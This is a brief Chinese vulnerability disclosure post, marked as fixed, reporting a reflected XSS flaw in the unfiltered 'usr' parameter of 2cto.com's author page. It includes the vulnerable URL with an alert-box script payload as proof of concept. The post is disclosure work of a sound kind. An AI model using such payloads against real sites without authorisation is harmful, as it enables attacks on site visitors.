频道栏目
首页 > 安全 > 网站安全 > 正文

红黑联盟一个xss[已修复]

2013-08-12 08:17:00            作者:H3art
收藏   我要投稿

 红黑联盟xss
作者:h3art
http://www.2cto.com/index.php?m=content&c=index&a=author&usr=
未对usr进行过滤
现在usr后面随便输入一个
http://www.2cto.com/index.php?m=content&c=index&a=author&usr=admin
\
查看源码
\
然后改变usr后面的值为xss代码http://www.2cto.com/index.php?m=content&c=index&a=author&usr=<script>alert(/xsstest/)</scrip>
\\
 

相关TAG标签 联盟
上一篇:完美世界客服中心XSS
下一篇:街旁网平衡权限漏洞可编辑他人信息
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站